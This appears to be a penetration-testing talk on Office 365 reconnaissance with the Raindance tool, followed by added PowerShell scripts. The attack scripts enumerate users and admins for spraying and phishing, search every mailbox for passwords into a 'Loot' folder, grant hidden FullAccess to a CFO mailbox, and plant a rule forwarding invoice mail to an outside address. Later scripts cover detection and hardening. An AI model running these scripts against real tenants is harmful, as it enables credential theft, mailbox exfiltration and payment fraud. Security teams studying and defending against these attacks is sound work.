Explore the unique features of Microsoft Office 365 accessible to admins and learn how attackers can exploit user privileges to gain access without breaking the perimeter. Discover the power of PowerShell and Office REST API for critical data extraction, domain compromises, and more. Stick around for insights from forensics experts.
Raindance Raining Recon from the Microsoft Cloud Presented by Michael Stringer
Introductions
• Following the path of penetration testing & exploit development since 2010
• Wrote The Hacker Ethos, a beginner's guide book for learning ethical hacking
• Enjoys writing things like books, blogs, and things (weird, right?)
• Generally having a good time breaking stuff, pentesting & writing code
Mike Stringer: Research Analyst, Penetration Tester, Malware Research, Computer Forensics, Journeyman of Python Zen, Open Source Contributor
Got some fun stuff to share …
• Microsoft Office 365 has some unique features reserved for admins… except admins aren't the only ones with access.
• Another example of why user privileges are more powerful than you might assume.
• PowerShell & the Office REST API have interesting features that admins use every day without realising an attacker with ordinary user credentials can use them too.
• In the best/worst cases, you can grab critical data or gain a domain compromise without ever having broken the perimeter.
• The Forensics guys might wanna stick around ;)
A little about Exchange & Office 365
Exchange On-Premises
• Only SMTP is accessible with user creds
• Requires local domain for login
• Only provides access to email remotely (no file access)
• Usually must be configured on the local network
• Management access via PowerShell only from the local network
Office 365 A.K.A. "the cloud lifestyle"
• Email remotely accessible from anywhere using the email address
• No local domain required
• Comes with SharePoint/OneDrive access, accessible from anywhere
• Configurable from anywhere
• Office 365 management via PowerShell from … anywhere!
Accessing the Cloud via PowerShell is cool!
(Screenshot: basic Office 365 login)
• Gaining access to the cloud via PowerShell was always intended to be easy for administrators to do & automate their work.
• Exchange & O365 have always provided the ability to manage the system via PowerShell.
• Easily allows automation & management of users, licenses, password resets, emails, logs & SharePoint content.
• Very awesome for admins, except for one problem…
(Screenshot: scripted Microsoft Exchange / Office 365 login)
Anyone can do it… • By default, all users have access to Office 365 & Exchange via PowerShell with read-access to domain information. • Not a problem in an on-premises environment, but the cloud (accessible from anywhere) is another story. • Any user can read anything about the Office 365 tenant that is available to them, which is a lot. • Conclusion: If an attacker guesses credentials to just one user, it can be a gateway into the network without ever touching the perimeter.
ME: Hey Microsoft, can you tell me this company's domain information?
MS: Naturally. Here you go.
Sign in to O365, then start gathering information …
• Pull the list of domains joined to Office 365 (Get-MsolDomain). Domains joined to Office 365 indicate places where SSO is in use and increase the attack surface.
• A domain whose Authentication is "Federated" indicates an ADFS trust with the target's local domain (and almost always directory synchronization alongside it).
• View the licenses the tenant has (Get-MsolAccountSku). Licenses = services to attack (PowerBI, Delve, Azure, and more!)
ME: Hey Microsoft, can you tell us about this company's info?
MS: SURE! :D
The company configuration (Get-MsolCompanyInformation) can tell us a lot about the user and target environment:
• SelfServePasswordResetEnabled = True
• UsersPermissionTo*Enabled = everything the user is able to do (default: UsersPermissionToReadOtherUsersEnabled is True, i.e. read all)
• DirectorySynchronizationEnabled = True indicates the local AD is synced to the cloud and Single Sign-On is in use.
• TechnicalNotificationEmails: bet you anything that's a DA.
• PasswordSynchronizationEnabled: in this environment password sync isn't enabled, but if it was, you'd find out right here.
ME: Can I have everyone's usernames?
MS: No problem, homie!
Pull a list of users with full contact details (Get-MsolUser -All). This gives us ample opportunity to use password spraying at our leisure. You also get the user's confirmed contact information, job title, and any other info they've volunteered to the cloud. Good for phishing.
ME: How about all your mail groups?
MS: Absolutely!
Find your groups … and who's in 'em.
• Pull a list of mail/security distribution groups (Get-MsolGroup). We can assume job roles & departments and pick out specific targets for phishing emails.
• Security group members can be listed by the group's ObjectId (Get-MsolGroupMember -GroupObjectId). Useful for targeting groups of likely susceptible users.
ME: What about all your security/user roles?
MS: Of course! Here you go!
Use Get-MsolRole to pull out the list of roles that carry permissions in Office 365. Now we know the list of Office 365 permissions they have available. Wait … whut?
Using Get-MsolRoleMember -RoleObjectId <object-id> on the "Company Administrator" role (the MSOnline name for Global Administrator, the O365 version of Domain Admin) we get a list of all the company admins.
So with just basic user credentials, we now have:
• The domain structure & software in use
• The entire network user list
• Everyone's contact info, job title, department, and even the last time they changed their password
• A list of the administrative users
• A list of all the mailing & security groups
• The freedom to view all the licenses users own
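The whole recon walk from the last few slides (login, domains, company information, licenses, users, groups, roles, admins, CSV dump) as one script. This is an added example written for this page, not Raindance's own code; the tenant contoso.com, the user jsmith@contoso.com and the password are constructed placeholders. It uses the MSOnline cmdlets the deck relies on; note that Microsoft has since retired the MSOnline module in favour of the Microsoft Graph PowerShell SDK, so on a current tenant the same questions are asked with Get-MgDomain, Get-MgUser, Get-MgDirectoryRole and friends, and the default that lets ordinary users read the directory is the same.

```powershell
# Added example, not part of the deck or of Raindance.
# Assumptions: MSOnline module installed; jsmith@contoso.com / Winter2017! are
# constructed credentials for an ordinary (non-admin) user of the tenant.
Import-Module MSOnline

$upn  = "jsmith@contoso.com"
$pass = ConvertTo-SecureString "Winter2017!" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ($upn, $pass)
Connect-MsolService -Credential $cred

# 1. Domains: Authentication = Federated means an ADFS trust to the on-prem forest.
$domains = Get-MsolDomain
$domains | Select-Object Name, Status, Authentication, IsDefault | Format-Table -AutoSize

# 2. Tenant configuration: sync, password hash sync, self-service reset, who gets the alerts.
$company = Get-MsolCompanyInformation
$company | Select-Object DisplayName, DirectorySynchronizationEnabled, LastDirSyncTime,
    PasswordSynchronizationEnabled, SelfServePasswordResetEnabled,
    UsersPermissionToReadOtherUsersEnabled, TechnicalNotificationEmails | Format-List

# 3. Licenses = services that exist in this tenant and can be attacked.
Get-MsolAccountSku | Select-Object AccountSkuId, ActiveUnits, ConsumedUnits | Format-Table -AutoSize

# 4. Every user, with the fields that matter for spraying and phishing.
$users = Get-MsolUser -All
$users | Select-Object UserPrincipalName, DisplayName, Title, Department,
    PhoneNumber, MobilePhone, LastPasswordChangeTimestamp, BlockCredential |
    Export-Csv -Path .\users.csv -NoTypeInformation

# 5. Groups and their members, flattened to one row per (group, member).
$groups = Get-MsolGroup -All
$membership = foreach ($g in $groups) {
    foreach ($m in (Get-MsolGroupMember -GroupObjectId $g.ObjectId -All)) {
        [pscustomobject]@{ Group = $g.DisplayName; GroupType = $g.GroupType
                           Member = $m.EmailAddress; MemberType = $m.GroupMemberType }
    }
}
$membership | Export-Csv -Path .\groups.csv -NoTypeInformation

# 6. Roles and who holds them. "Company Administrator" is the Global Admin role.
$roleHolders = foreach ($r in Get-MsolRole) {
    foreach ($m in (Get-MsolRoleMember -RoleObjectId $r.ObjectId -All)) {
        [pscustomobject]@{ Role = $r.Name; Member = $m.EmailAddress; Type = $m.RoleMemberType }
    }
}
$roleHolders | Export-Csv -Path .\roles.csv -NoTypeInformation

$globalAdmins = $roleHolders | Where-Object Role -eq "Company Administrator"
"Users: {0}  Groups: {1}  Role holders: {2}  Global admins: {3}" -f
    $users.Count, $groups.Count, $roleHolders.Count, $globalAdmins.Count
$globalAdmins | Format-Table -AutoSize
```

Everything above is a Get-* call, which is exactly why it works with a plain user: MSOnline only enforces role checks on writes, and the tenant-wide UsersPermissionToReadOtherUsersEnabled default hands the directory to any authenticated account.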
Mail at your fingertips
An Exchange admin has the ability to search & read user emails with syntax like so:
Get-Mailbox -ResultSize Unlimited | Search-Mailbox -SearchQuery "Body:'*password*'"
This searches all mailboxes the admin has access to for the word "password" in the body.
Connecting to other services via PowerShell gives us access to … (there are similar ways to connect to other services and manipulate them):
• Email & Chat (Microsoft Exchange / Skype)
• Logs
• File Shares (SharePoint / OneDrive)
• Business Analytics and Data (PowerBI)
• Developer documentation (Delve)
• Security & Compliance tools (for Office 365 admins)
With a PowerShell session imported from Exchange Online you can:
• Pull & search emails
• Use administrative rights to impersonate users, then read their emails too
• Read/send mail from other users as admin using the Exchange Web Services (EWS) API
• Manage mailbox rules (remember Ruler?)
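The Exchange side of the same attack, assuming the earlier recon turned up a reusable admin credential. This is an added example for this page, not the deck's code; admin@contoso.com and cfo@contoso.com are constructed, and the admin account is assumed to hold the Mailbox Search and Mailbox Import Export roles that Search-Mailbox requires. Two caveats a reader running this today should know: the Basic-auth remote PowerShell endpoint used here has been retired in favour of Connect-ExchangeOnline from the ExchangeOnlineManagement module, and Search-Mailbox has been superseded by New-ComplianceSearch; the permission-grant and inbox-rule cmdlets are unchanged.

```powershell
# Added example, not part of the deck or of Raindance.
# Assumed: admin@contoso.com is a compromised Exchange admin; cfo@contoso.com is the target.
$cred = Get-Credential -UserName "admin@contoso.com" -Message "Exchange Online"
$session = New-PSSession -ConfigurationName Microsoft.Exchange `
    -ConnectionUri "https://outlook.office365.com/powershell-liveid/" `
    -Credential $cred -Authentication Basic -AllowRedirection
Import-PSSession $session -DisableNameChecking | Out-Null

# 1. Search every mailbox for credentials and copy the hits into a folder we control.
#    Without -TargetMailbox/-TargetFolder the cmdlet only estimates; with them it copies.
Get-Mailbox -ResultSize Unlimited |
    Search-Mailbox -SearchQuery "Body:'password'" `
        -TargetMailbox "admin@contoso.com" -TargetFolder "Loot" -LogLevel Full

# 2. Give ourselves FullAccess to one mailbox. -AutoMapping $false keeps it out of the
#    victim's colleagues' Outlook folder pane, so nothing visibly changes.
Add-MailboxPermission -Identity "cfo@contoso.com" -User "admin@contoso.com" `
    -AccessRights FullAccess -InheritanceType All -AutoMapping $false

# 3. Inbox rules: read what is there, then plant a forwarding rule (the Ruler-style trick).
Get-InboxRule -Mailbox "cfo@contoso.com" |
    Select-Object Name, Enabled, ForwardTo, RedirectTo, DeleteMessage | Format-Table -AutoSize
New-InboxRule -Mailbox "cfo@contoso.com" -Name "Archive" `
    -SubjectContainsWords "invoice","wire" -ForwardTo "archive@example.net" -StopProcessingRules $true

# 4. What the defender sees: the write cmdlets above land in the admin audit log.
Search-AdminAuditLog -Cmdlets Search-Mailbox,Add-MailboxPermission,New-InboxRule `
    -StartDate (Get-Date).AddHours(-1) -EndDate (Get-Date) |
    Select-Object RunDate, Caller, CmdletName, ObjectModified | Format-Table -AutoSize

Remove-PSSession $session
```

Step 4 is the forensics hook the deck promises: Get-* recon leaves almost nothing in the Exchange admin audit log, but every mailbox permission grant and inbox rule does, so those cmdlet names are the first thing to search for in an incident.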
You can have your SharePoint and PWN it too
You can connect using the SharePoint Online (SPO) PowerShell commands …
• List out all the SP sites that exist for a domain
• Show sites you have read/write access to
• Search sites for specific terms & content
• Drop malicious files into SP and share the love with other users
Or … you can connect using the Web Services API for more control and to manipulate files.
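Tenant-level SharePoint recon with the SPO cmdlets, as an added example for this page (not the deck's code). Caveat that the slide glosses over: Connect-SPOService only accepts accounts holding the SharePoint Administrator or Global Administrator role, so this listing is what an attacker gets after the admin list from the earlier recon yields a reusable credential; an ordinary user only sees the sites they can already open in a browser. contoso.com and the site URLs are constructed.

```powershell
# Added example, not part of the deck or of Raindance.
# Assumed: $cred holds a SharePoint admin credential for the constructed tenant contoso.com.
Import-Module Microsoft.Online.SharePoint.PowerShell -DisableNameChecking
Connect-SPOService -Url "https://contoso-admin.sharepoint.com" -Credential $cred

# 1. Every site collection in the tenant, with owner and external-sharing posture.
$sites = Get-SPOSite -Limit All
$sites | Select-Object Url, Owner, Template, SharingCapability, StorageUsageCurrent |
    Sort-Object StorageUsageCurrent -Descending | Format-Table -AutoSize

# 2. Sites that allow sharing outside the tenant are the easiest place to park a payload
#    and "share the love", because the link will work for an external recipient too.
$sites | Where-Object { $_.SharingCapability -ne "Disabled" } | Select-Object Url, SharingCapability

# 3. Who can already get into the interesting ones, and any external users the tenant has invited.
Get-SPOUser -Site "https://contoso.sharepoint.com/sites/finance" -Limit All |
    Select-Object LoginName, IsSiteAdmin, Groups | Format-Table -AutoSize
Get-SPOExternalUser -PageSize 50 | Select-Object Email, AcceptedAs, WhenCreated

Disconnect-SPOService
```

The SPO module manages site collections, not files; uploading the malicious document in the deck's last bullet is done through the SharePoint REST/CSOM API or simply the browser, using the target user's own permissions.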
Advantages of using PowerShell on a Pentest
• 100% accurate usernames & emails
• Access to SharePoint gives you a trusted platform to deploy malware
• List all the contact details of your targets, who the administrators are, and the groups they belong to
• All of this recon can be done without touching the target's network
• No need to be quiet: these are intended usages of PowerShell, and Get-* cmdlets leave little in the Exchange admin audit log
• At the time of the talk, no automated tools existed to alert on this PowerShell usage. Caveat: the sign-in itself is still recorded in the tenant's sign-in logs, and write cmdlets are logged, so "quiet" depends on what the target has enabled and reviews
Introducing Raindance
• Automates all that boring stuff
• Simplifies the PowerShell syntax & information gathering process
• Stores all the data in handy variables for you to search/manipulate
• Dumps all the information to a CSV or txt file
Essential features of Raindance
• Rain-Login: connect to Office 365
• Rain-Get<?>: get stuff
• Rain-Show <?>: show stuff
• Rain-Dump <?>: dump stuff to CSV or txt files
• Windows only for now
• Available on GitHub for you to use
Get & Show
• Rain-GetUsers to get the list of usernames and details
• Rain-GetAll to just get everything
• Rain-Show users to show the user details you just pulled
• You can show Users, Groups, Roles, Admins, and Gadmins (company admins) instantly
Dump your recon to a CSV
Rain-DumpAll -path C:\path\to\directory
When ready, Raindance can save everything into a series of .csv files for you to perform more analysis on at your leisure. The CSVs are far more verbose: they contain all information gathered, not just what appears in the PowerShell tables.
How do I stop this attack?
• Implement Multi-Factor Authentication and CORRECTLY enforce SSO policies
  • Without multi-factor authentication, the only thing keeping attackers out is one set of credentials.
  • The odds are against you. Sophisticated attackers will get user creds, but MFA can still stop them cold.
• Require X.509 certificates via ADFS to log into Office 365 and Exchange
  • This is nearly impossible to bypass without having compromised a local system.
  • Prevents 2-factor bypass via the EWS Exchange API.
• Disable PowerShell access to Office 365 & Exchange for end users
  • Average users don't need PowerShell for daily work.
  • Otherwise the legacy Exchange API (Basic auth) lets attackers bypass 2-factor authentication.
  • Principle of Least Privilege!!! IT'S IMPORTANT!
• Disable Office Graph and the REST API
  • If you aren't a developer, you don't need it.
  • The REST API allows 2-factor bypass in certain OWA portals and misconfigured federated environments.
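The three controls above that can be applied from PowerShell, as an added example for this page (not the deck's code): remove remote PowerShell from non-admins, require MFA per user, and block Basic (legacy) authentication so EWS and the old remote PowerShell endpoint cannot be used to sidestep MFA. It assumes an Exchange Online session and MSOnline connection as a Global Admin; contoso.com and jsmith@contoso.com are constructed. Caveat: per-user StrongAuthenticationRequirements is the legacy MFA mechanism the deck's era used; Conditional Access policies are the current way to require MFA, and the MSOnline module itself has been retired. The Exchange Online cmdlets (Set-User, New-AuthenticationPolicy, Set-OrganizationConfig) are current.

```powershell
# Added example, not part of the deck or of Raindance.
# Assumed: Connect-MsolService and an imported Exchange Online session already exist,
# both as a Global Administrator of the constructed tenant contoso.com.

# 1. Least privilege: only accounts that hold a directory role keep remote PowerShell.
$roleHolders = Get-MsolRole |
    ForEach-Object { Get-MsolRoleMember -RoleObjectId $_.ObjectId -All } |
    Select-Object -ExpandProperty EmailAddress -Unique
Get-User -ResultSize Unlimited -RecipientTypeDetails UserMailbox |
    Where-Object { $roleHolders -notcontains $_.UserPrincipalName -and $_.RemotePowerShellEnabled } |
    ForEach-Object {
        Set-User -Identity $_.Identity -RemotePowerShellEnabled $false
        "Disabled remote PowerShell for {0}" -f $_.UserPrincipalName
    }

# 2. MFA for every user that does not yet have it enforced (legacy per-user method).
$req = New-Object -TypeName Microsoft.Online.Administration.StrongAuthenticationRequirement
$req.RelyingParty = "*"
$req.State = "Enabled"
Get-MsolUser -All |
    Where-Object { -not $_.StrongAuthenticationRequirements -and -not $_.BlockCredential } |
    ForEach-Object {
        Set-MsolUser -UserPrincipalName $_.UserPrincipalName -StrongAuthenticationRequirements @($req)
    }

# 3. Close the MFA bypass: a new authentication policy blocks every Basic-auth protocol
#    (EWS, remote PowerShell, POP, IMAP, ActiveSync, ...) unless a -Allow* switch re-enables it.
New-AuthenticationPolicy -Name "Block Basic Auth" | Out-Null
Set-OrganizationConfig -DefaultAuthenticationPolicy "Block Basic Auth"
# Policy changes are cached for up to 24h; force an immediate re-evaluation for a given user.
Set-User -Identity "jsmith@contoso.com" -STSRefreshTokensValidFrom (Get-Date)

# 4. Verify: who can still reach remote PowerShell, and which users lack MFA.
Get-User -ResultSize Unlimited |
    Where-Object RemotePowerShellEnabled |
    Select-Object UserPrincipalName | Format-Table -AutoSize
Get-MsolUser -All |
    Where-Object { -not $_.StrongAuthenticationRequirements } |
    Select-Object UserPrincipalName | Format-Table -AutoSize
```

Step 1 kills the recon path this deck is about, step 3 is what actually stops the EWS/legacy-auth bypass that the slide warns about, and without step 3, step 2 only protects the interactive login.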
Feature Abuse is still alive thanks to Office 365
Any user can disclose all of this info, any admin can control every user, and in the right conditions, the legacy Exchange API allows you to bypass MFA.
Take-aways
• These features are not likely to go away. If anything, more features (read: vulnerabilities) will be added.
• Pentesters: don't ignore the cloud as an attack surface.
• Admins: don't ignore the cloud as a gaping hole in your security.
• Feature abuse is still a viable tactic.
• PowerShell, C#, & .NET are all viable options for attacking the cloud. It's just a matter of finding the "features" that let it happen.
Download & Contribute to Raindance • Download from: https://github.com/True-Demon/raindance.git • I will be adding new features whenever possible • I accept donations in the form of: • Issues • Feature Requests • Pull Requests • Beer • Contact me @: • https://github.com/True-Demon • truedemon@riseup.net
This concludes our broadcast day Questions?